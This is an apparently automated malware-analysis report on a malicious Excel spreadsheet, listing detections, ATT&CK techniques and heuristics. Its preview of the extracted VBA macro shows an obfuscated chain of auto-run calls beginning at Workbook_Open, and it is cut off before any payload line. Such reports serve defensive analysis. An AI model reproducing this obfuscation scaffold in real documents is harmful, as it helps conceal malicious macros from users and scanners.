Verdict: MALICIOUS (Risk Score: 228)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The file is an Excel spreadsheet containing a Workbook_Open VBA macro. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary code. The macro's structure suggests it is designed to download and execute a second-stage payload, a common technique for malware delivery. The presence of the ClamAV detection 'Xls.Malware.Valyria-10036514-0' further supports its malicious nature.
Heuristics (6)
- ClamAV: Xls.Malware.Valyria-10036514-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16929 bytes |

SHA-256: 51d0fe75693e20140b774e65acc2f1f995e272c53d4483ba7edcd527a58bb08f

Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "TrustMind1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "TrustMind"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub wOrkboOk_open(): Call qEytV: End Sub
Static Sub qEytV()
Call UHwAT
End Sub
Static Sub UHwAT()
Call xLvIR
End Sub
Static Sub xLvIR()
Call bOtPQ
End Sub
Static Sub bOtPQ()
Call FRrXO
End Sub
Static Function FRrXO() As Currency
Call jUpeM
End Function
Static Function jUpeM() As Boolean
Call zDeVg
End Function
Static Function zDeVg() As Object
Call cGcde
End Function
Static Function cGcde() As Integer
Call GJakd
End Function
Static Function GJakd() As String
Call kNZrb
End Function
Static Function kNZrb() As Currency
Call OQXzZ
End Function
Static Sub OQXzZ()
Call sTVGX
End Sub
Static Sub sTVGX()
Call VWTOV
End Sub
Private Sub VWTOV()
Call lFIFq
End Sub
Private Function lFIFq() As Integer
Call PIGMo
End Function
Private Function PIGMo() As String
Call LxKgZ
End Function
Private Function LxKgZ() As Variant
Call XDwjB
End Function
Static Function XDwjB() As String
Call VoZWz
End Function
Static Function VoZWz() As Integer
Call htLZa
End Function
Private Function htLZa()
Call tzycC
End Function
Static Function tzycC() As Integer
Call rkbOA
End Function
Static Function rkbOA() As Object
Call DqNRc
End Function
Private Function DqNRc() As Single
Call QwzUE
End Function
Static Function QwzUE() As Single
Call cCmXg
End Function
Static Sub cCmXg()
Call rpIoX
End Sub
Private Sub rpIoX()
Call Duurz
End Sub
Static Sub Duurz()
Call PAgub
End Sub
Static Sub PAgub()
Call NlKgZ
End Sub
Private Sub NlKgZ()
Call ZrwjB
End Sub
Static Sub ZrwjB()
Call lximd
End Sub
Static Sub lximd()
Call xDUpF
End Sub
Private Sub xDUpF()
Call voycD
End Sub
Static Sub voycD()
Call Hukff
End Sub
Static Sub Hukff()
Call TAWiH
End Sub
Private Sub TAWiH()
Call RlAUF
End Sub
Static Function RlAUF() As Object
Call drmXh
End Function
Static Function drmXh() As Single
Call pwYaJ
End Function
Static Function pwYaJ() As Single
Call BCKdl
End Function
Static Function BCKdl() As Date
Call AnoQj
End Function
Static Function AnoQj() As Boolean
Call MtaTL
End Function
Static Function MtaTL() As Boolean
Call YzMWm
End Function
Static Function YzMWm() As Byte
Call kFyZO
End Function
Static Function kFyZO() As Double
Call iqcLM
End Function
Static Function iqcLM() As Currency
Call uwOOo
End Function
Static Function uwOOo() As Long
Call GCARQ
End Function
Static Function GCARQ() As String
Call EneEO
End Function
Static Function EneEO() As Long
Call QsQHq
End Function
Static Function QsQHq() As Variant
Call cyCKS
End Function
Private Function cyCKS() As Integer
Call oEoNu
End Function
Static Sub oEoNu()
Call mpSzs
End Sub
Static Function mpSzs()
Call yvECU
End Function
Private Function yvECU() As Single
Call KBqFw
End Function
Static Sub KBqFw()
Call JmUsu
End Sub
Static Sub JmUsu()
Call VsGvW
End Sub
Private Sub VsGvW()
Call hysyy
End Sub
Static Sub hysyy()
Call tEeBZ
End Sub
Static Sub tEeBZ()
Call FgWcZ
End Sub
Sub FgWcZ()
Call PuYSm
End Sub
Sub PuYSm()
Call MnSrV
End Sub
Function MnSrV() As Date
Call JfMRE
End Function
Sub JfMRE()
Call UtOGR
End Sub
Private Function UtOGR() As Variant
Call RmIfB
End Function
Sub RmIfB()
Call OfCFk
End Sub
Static Sub OfCFk()
Call YtEux
End Sub
Function YtEux() As Byte
Call VlyUg
End Function
Static Sub VlyUg()
Call SestP
End Sub
Function SestP()
Call dsuic
End Function
Function dsuic() As Integer
Call aloIM
End Function
Fun
```
... (truncated)